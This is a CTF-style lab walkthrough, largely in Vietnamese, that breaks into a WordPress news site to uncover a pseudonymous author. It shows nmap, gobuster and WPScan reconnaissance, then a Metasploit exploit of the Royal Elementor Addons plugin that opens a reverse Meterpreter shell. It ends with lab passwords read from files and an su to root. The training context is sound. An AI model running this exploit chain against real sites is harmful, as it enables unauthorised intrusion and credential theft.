Gridloy News Lab
Gridloy News Lab
Recently, a mysterious writer using the pseudonym “Currol” has been publishing striking and influential news articles. The true identity of this writer remains a major mystery. Currol is particularly known for his in-depth analyses in the field of politics, making a name internationally. However, there is no information available about who is behind these writings. Your task is to uncover the real identity of Currol. In this process, your job will involve vulnerability research on the website where the writer’s articles are published.
What is the pseudonym used by the author?
- Truy Cập vào trang web , tôi vào Contact , Cuối Trang có bút danh tác Giả .
==> The Answer : Currol
What is the WordPress password?
- Dùng nmap quét mục tiêu .
┌─[✗]─[root@hackerbox]─[~]
└──╼ #nmap 172.20.25.75 -sC -sV -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-30 13:04 CST
Nmap scan report for 172.20.25.75
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 52:54:00:FB:73:CA (QEMU virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.15 seconds- Dùng Gobuster quét thư mục .
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://gridloy.hv/" -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://gridloy.hv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/index.php (Status: 301) [Size: 0] [--> http://gridloy.hv/]
/php.ini (Status: 200) [Size: 65]
/server-status (Status: 403) [Size: 275]
/wp-admin (Status: 301) [Size: 311] [--> http://gridloy.hv/wp-admin/]
/wp-content (Status: 301) [Size: 313] [--> http://gridloy.hv/wp-content/]
/wp-includes (Status: 301) [Size: 314] [--> http://gridloy.hv/wp-includes/]
Progress: 4614 / 4615 (99.98%)
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #- Sau đó tôi dùng công cụ WPScan để tìm user trên trang wordpress này
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #wpscan --url http://gridloy.hv/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://gridloy.hv/ [172.20.25.75]
[+] Started: Sun Nov 30 12:49:46 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://gridloy.hv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://gridloy.hv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://gridloy.hv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://gridloy.hv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.2 identified (Latest, released on 2023-12-06).
| Found By: Rss Generator (Passive Detection)
| - http://gridloy.hv/?feed=rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
| - http://gridloy.hv/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
[+] WordPress theme in use: the-minimal-blogger
| Location: http://gridloy.hv/wp-content/themes/the-minimal-blogger/
| Latest Version: 1.0 (up to date)
| Last Updated: 2024-01-03T00:00:00.000Z
| Readme: http://gridloy.hv/wp-content/themes/the-minimal-blogger/readme.txt
| [!] Directory listing is enabled
| Style URL: http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css
| Style Name: The Minimal Blogger
| Style URI: https://superbthemes.com/minimalistix/the-minimal-blogger/
| Description: Introducing The Minimal Blogger, a versatile and elegant WordPress theme perfect for bloggers, write...
| Author: superbaddons
| Author URI: http://superbthemes.com/
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css, Match: 'Version: 1.0'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 30 12:49:48 2025
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 12.841 KB
[+] Data Received: 346.741 KB
[+] Memory used: 183.047 MB
[+] Elapsed time: 00:00:01
┌─[root@hackerbox]─[~]
└──╼ #
- Kết quả cho ta biết được user là admin.
- Tiếp theo là việc quan trọng nhất là tìm các pluggin có lổ hỏng .
┌─[root@hackerbox]─[~]
└──╼ #wpscan --url http://gridloy.hv/ --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://gridloy.hv/ [172.20.25.75]
[+] Started: Sun Nov 30 12:54:42 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://gridloy.hv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://gridloy.hv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://gridloy.hv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://gridloy.hv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.2 identified (Latest, released on 2023-12-06).
| Found By: Rss Generator (Passive Detection)
| - http://gridloy.hv/?feed=rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
| - http://gridloy.hv/?feed=comments-rss2, <generator>https://wordpress.org/?v=6.4.2</generator>
[+] WordPress theme in use: the-minimal-blogger
| Location: http://gridloy.hv/wp-content/themes/the-minimal-blogger/
| Latest Version: 1.0 (up to date)
| Last Updated: 2024-01-03T00:00:00.000Z
| Readme: http://gridloy.hv/wp-content/themes/the-minimal-blogger/readme.txt
| [!] Directory listing is enabled
| Style URL: http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css
| Style Name: The Minimal Blogger
| Style URI: https://superbthemes.com/minimalistix/the-minimal-blogger/
| Description: Introducing The Minimal Blogger, a versatile and elegant WordPress theme perfect for bloggers, write...
| Author: superbaddons
| Author URI: http://superbthemes.com/
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://gridloy.hv/wp-content/themes/the-minimal-blogger/style.css, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:45 <=============================================================================> (104378 / 104378) 100.00% Time: 00:00:45
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://gridloy.hv/wp-content/plugins/akismet/
| Latest Version: 5.3.1
| Last Updated: 2024-01-17T22:32:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] elementor
| Location: http://gridloy.hv/wp-content/plugins/elementor/
| Latest Version: 3.18.3 (up to date)
| Last Updated: 2023-12-20T16:49:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/elementor/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/, status: 200
|
| Version: 3.18.3 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.18.3
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/elementor/readme.txt
[+] royal-elementor-addons
| Location: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/
| Last Updated: 2024-01-25T13:58:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
| [!] The version is out of date, the latest version is 1.3.87
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/, status: 200
|
| Version: 1.3.78 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
[+] wp-file-manager
| Location: http://gridloy.hv/wp-content/plugins/wp-file-manager/
| Latest Version: 7.2.2 (up to date)
| Last Updated: 2024-01-18T09:52:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 7.2.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/wp-file-manager/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 30 12:55:34 2025
[+] Requests Done: 104395
[+] Cached Requests: 43
[+] Data Sent: 22.55 MB
[+] Data Received: 14.069 MB
[+] Memory used: 503.859 MB
[+] Elapsed time: 00:00:52
┌─[root@hackerbox]─[~]
└──╼ #- Mục tiêu của tôi là pluggin royal-elementor-addons vì nó là phiên bản 1.3.78 và tìm thấy payload trong metasploit :
[+] royal-elementor-addons
| Location: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/
| Last Updated: 2024-01-25T13:58:00.000Z
| Readme: http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt
| [!] The version is out of date, the latest version is 1.3.87
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/, status: 200
|
| Version: 1.3.78 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://gridloy.hv/wp-content/plugins/royal-elementor-addons/readme.txt- Tìm payload về royal-elementor-addons và attack .
msf6 > search wp_royal_elementor_addons
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_royal_elementor_addons_rce 2023-11-23 excellent Yes WordPress Royal Elementor Addons RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_royal_elementor_addons_rce
msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) >
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set RHOSTS 172.20.25.75
RHOSTS => 172.20.25.75
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set SSl false
SSl => false
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > run
[*] Started reverse TCP handler on 172.20.25.180:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] Attempting to retrieve nonce...
[-] Exploit aborted due to failure: no-target: Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > run
[*] Started reverse TCP handler on 172.20.25.180:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[+] Detected Royal Elementor Addons version: 1.3.78
[+] The target appears to be vulnerable.
[*] Attempting to retrieve nonce...
[+] Nonce found in response: "14f556e193"
[*] Sending payload
[+] Payload uploaded successfully
[*] Triggering the payload
[*] Sending stage (40004 bytes) to 172.20.25.75
[*] Meterpreter session 1 opened (172.20.25.180:4444 -> 172.20.25.75:57346) at 2025-11-30 13:15:21 -0600
meterpreter >- Tôi tìm kiếm sơ thì thấy được đáp án :
pwd
/var/www/html/wordpress
ls
index.php
license.txt
my_passwords.txt
php.ini
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
cat my*
EMAIL: beth@gridloy.hv
PASSWORD: tears-cartoon
WORDPRESS
USERNAME: admin
PASSWORD: b2tGAIvRDpJpNit6q2
MYSQL
USERNAME: root
PASSWORD: LhfJ5DuAYN5nsSvB
USERS
USER: root
PASSWORD: aceRyanDI==> The Answer : b2tGAIvRDpJpNit6q2
Who is the author of the unpublished comment?
- Sau khi có Password của admin thì tôi truy cập vào trang quản trị wp-admin , tìm đến comment thì biết được đáp án câu này !
==> The Answer : Judson Braun
What is the real name and surname of the writer using the pseudonym “Currol”?
- Bước này tôi nghĩ là mình cần leo thang đặc quyền , vi đa số các bài Lab đều như thế cả :))
- Tôi tìm mãi không biết được nên leo thang kiểu gì thì ở câu 2 ta đã có password của root rồi mà tìm làm gì nữa :))
su root
Password: aceRyanDI
ls
index.php
license.txt
my_passwords.txt
php.ini
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
cd /root
ls
site_owner_informations.txt
cat *
SITE OWNER: Beth Reese
PSEUDONYM: Currol
EMAIL: jane.smith@blogsite.com
PHONE: +1-234-567-8901
ADDRESS:
1234 Liberty Lane,
Emerald City, Cascadia, 98765
United States
==> The Answer : Beth Reese